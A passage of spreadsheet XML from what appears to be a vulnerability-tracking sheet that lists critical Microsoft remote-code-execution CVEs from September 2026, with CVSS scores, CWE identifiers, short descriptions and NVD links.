          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Microsoft DirectMusic allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69491</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69493</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69493</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69496</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Compressed Folder allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69496</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69525</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69579</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69579</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69586</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows PDF allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69586</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69590</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69590</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69595</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69595</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69715</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Direct Show allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69715</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69730</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69730</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69768</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69768</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69769</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69769</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69819</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in RPC Runtime allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69819</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69824</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69824</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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4" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69845</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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6" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
